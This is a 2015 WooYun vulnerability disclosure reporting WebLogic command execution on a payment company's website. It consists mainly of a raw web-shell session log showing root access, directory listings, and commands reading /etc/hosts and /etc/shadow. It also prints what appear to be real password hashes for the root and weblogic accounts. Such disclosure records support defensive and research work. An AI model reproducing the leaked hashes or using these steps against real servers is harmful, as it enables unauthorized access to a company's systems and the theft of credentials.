当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162275

漏洞标题:联行支付某漏洞可漫游内网

相关厂商:联行支付ww.ecpay.cn

漏洞作者: 路人甲

提交时间:2015-12-22 18:40

修复时间:2016-02-07 18:35

公开时间:2016-02-07 18:35

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-22: 细节已通知厂商并且等待厂商处理中
2015-12-26: 厂商已经确认,细节仅向厂商公开
2016-01-05: 细节向核心白帽子及相关领域专家公开
2016-01-15: 细节向普通白帽子公开
2016-01-25: 细节向实习白帽子公开
2016-02-07: 细节向公众公开

简要描述:

详细说明:

http://**.**.**.**/官网哦 weblogc 命令执行
shell
http://**.**.**.**/jspspy.jspx

ecpay1.png


ecpay2.png


点到为止,可控制这个公司网络

/bin/sh: line 4: ipconfig: command not found
ifconfig
eth0      Link encap:Ethernet  HWaddr 6C:AE:8B:3B:5A:22
          inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**
          inet6 addr: fe80::6eae:8bff:fe3b:5a22/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:149526305 errors:0 dropped:0 overruns:0 frame:0
          TX packets:120117439 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:15612327340 (14.5 GiB)  TX bytes:111982525543 (104.2 GiB)
          Memory:91a60000-91a80000
eth1      Link encap:Ethernet  HWaddr 6C:AE:8B:3B:5A:23
          inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**
          inet6 addr: fe80::6eae:8bff:fe3b:5a23/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:46606428 errors:0 dropped:0 overruns:0 frame:0
          TX packets:48995860 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4062393812 (3.7 GiB)  TX bytes:7061418128 (6.5 GiB)
          Memory:91a40000-91a60000
lo        Link encap:Local Loopback
          inet addr:**.**.**.**  Mask:**.**.**.**
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:42370 errors:0 dropped:0 overruns:0 frame:0
          TX packets:42370 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:9803631 (9.3 MiB)  TX bytes:9803631 (9.3 MiB)
usb0      Link encap:Ethernet  HWaddr 6E:AE:8B:3B:5A:21
          inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**
          inet6 addr: fe80::6cae:8bff:fe3b:5a21/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:44321912 errors:0 dropped:0 overruns:0 frame:0
          TX packets:44189494 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3626173772 (3.3 GiB)  TX bytes:4234648024 (3.9 GiB)
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
ls
autodeploy
bin
config
console-ext
edit.lok
fileRealm.properties
http:
init-info
javax.servlet.context.tempdir
lib
nohup.out
pending
security
servers
startWebLogic.sh
tmp
pwd
/opt/weblogic103/user_projects/domains/mydomain
find -name weblogic.xml
./servers/AdminServer/upload/ech/WEB-INF/weblogic.xml
./servers/AdminServer/upload/eco20151012/WEB-INF/weblogic.xml
./servers/AdminServer/upload/eco/WEB-INF/weblogic.xml
./servers/AdminServer/upload/ech20151217/WEB-INF/weblogic.xml
./servers/AdminServer/upload/eco20151214/WEB-INF/weblogic.xml
./servers/AdminServer/upload/ecf/WEB-INF/weblogic.xml
./servers/AdminServer/upload/oldeco/WEB-INF/weblogic.xml
./servers/AdminServer/upload/eco.bak/WEB-INF/weblogic.xml
./servers/AdminServer/upload/ech20151214/WEB-INF/weblogic.xml
./servers/AdminServer/tmp/.appmergegen_1416791375320/ecd.war/30u8hq/WEB-INF/weblogic.xml
./servers/AdminServer/tmp/.appmergegen_1416791375320_ecd.war/WEB-INF/weblogic.xml
./servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/WEB-INF/weblogic.xml
./servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/WEB-INF/weblogic.xml
dir ../
mydomain
dir
autodeploy            http:                          security
bin                   init-info                      servers
config                javax.servlet.context.tempdir  startWebLogic.sh
console-ext           lib                            tmp
edit.lok              nohup.out
fileRealm.properties  pending
ls ../
mydomain
pwd
/opt/weblogic103/user_projects/domains/mydomain
ls /opt/weblogic103/
coherence_3.7
domain-registry.xml
logs
modules
ocm.rsp
registry.dat
registry.xml
user_projects
utils
wlserver_10.3
cat /opt/weblogic103/registry.xml
<?xml version="1.0" encoding="UTF-8"?>
<bea-product-information xmlns:fo="http://**.**.**.**/1999/XSL/Format" xmlns:gpr="http://**.**.**.**/ns/cie/gpr">
  <host home="/opt/weblogic103" name="localhost.localdomain">
    <product format="1.0" name="WebLogic Platform">
      <release level="10.3" ServicePackLevel="6" PatchLevel="0" Status="installed" InstallTime="Aug 22, 2014 1:36:08 PM" InstallDir="/opt/weblogic103">
        <component name="Common Infrastructure Engineering" version="**.**.**.**" InstallDir="">
          <component name="Uninstall"/>
          <component name="Patch Client"/>
          <component name="Patch Attachment Facility"/>
          <component name="Clone Facility"/>
        </component>
        <component name="WebLogic Server" version="**.**.**.**" InstallDir="/opt/weblogic103/wlserver_10.3">
          <component name="Core Application Server"/>
          <component name="Administration Console"/>
          <component name="Configuration Wizard and Upgrade Framework"/>
          <component name="Web 2.0 HTTP Pub-Sub Server"/>
          <component name="WebLogic SCA"/>
          <component name="WebLogic JDBC Drivers"/>
          <component name="Third Party JDBC Drivers"/>
          <component name="WebLogic Server Clients"/>
          <component name="WebLogic Web Server Plugins"/>
          <component name="UDDI and Xquery Support"/>
          <component name="Evaluation Database"/>
          <component name="Workshop Code Completion Support"/>
        </component>
        <component name="Oracle Configuration Manager" version="**.**.**.**" InstallDir="">
          <component name="Data Collector"/>
        </component>
        <component name="Oracle Coherence" version="**.**.**.**" InstallDir="/opt/weblogic103/coherence_3.7">
          <component name="Coherence Product Files"/>
        </component>
      </release>
    </product>
  </host>
</bea-product-information>
ls
autodeploy
bin
config
console-ext
edit.lok
fileRealm.properties
http:
init-info
javax.servlet.context.tempdir
lib
nohup.out
pending
security
servers
startWebLogic.sh
tmp
history
ls
autodeploy
bin
config
console-ext
edit.lok
fileRealm.properties
http:
init-info
javax.servlet.context.tempdir
lib
nohup.out
pending
security
servers
startWebLogic.sh
tmp
ls /root
anaconda-ks.cfg
Desktop
install.log
install.log.syslog
cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
**.**.**.**               localhost.localdomain localhost
::1             localhost6.localdomain6 localhost6
cat /etc/shadow
root:$1$ROcyhN9o$PDkUIuRJvAUGUUeFrmUPc1:16302:0:99999:7:::
bin:*:16302:0:99999:7:::
daemon:*:16302:0:99999:7:::
adm:*:16302:0:99999:7:::
lp:*:16302:0:99999:7:::
sync:*:16302:0:99999:7:::
shutdown:*:16302:0:99999:7:::
halt:*:16302:0:99999:7:::
mail:*:16302:0:99999:7:::
news:*:16302:0:99999:7:::
uucp:*:16302:0:99999:7:::
operator:*:16302:0:99999:7:::
games:*:16302:0:99999:7:::
gopher:*:16302:0:99999:7:::
ftp:*:16302:0:99999:7:::
nobody:*:16302:0:99999:7:::
nscd:!!:16302:0:99999:7:::
vcsa:!!:16302:0:99999:7:::
ntp:!!:16302:0:99999:7:::
pcap:!!:16302:0:99999:7:::
dbus:!!:16302:0:99999:7:::
avahi:!!:16302:0:99999:7:::
rpc:!!:16302:0:99999:7:::
mailnull:!!:16302:0:99999:7:::
smmsp:!!:16302:0:99999:7:::
sshd:!!:16302:0:99999:7:::
oprofile:!!:16302:0:99999:7:::
rpcuser:!!:16302:0:99999:7:::
nfsnobody:!!:16302:0:99999:7:::
xfs:!!:16302:0:99999:7:::
haldaemon:!!:16302:0:99999:7:::
avahi-autoipd:!!:16302:0:99999:7:::
gdm:!!:16302:0:99999:7:::
sabayon:!!:16302:0:99999:7:::
weblogic:$1$UliL63Sn$UodIsckph5OG21qySugvD0:16304:0:99999:7:::

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-12-26 23:38

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无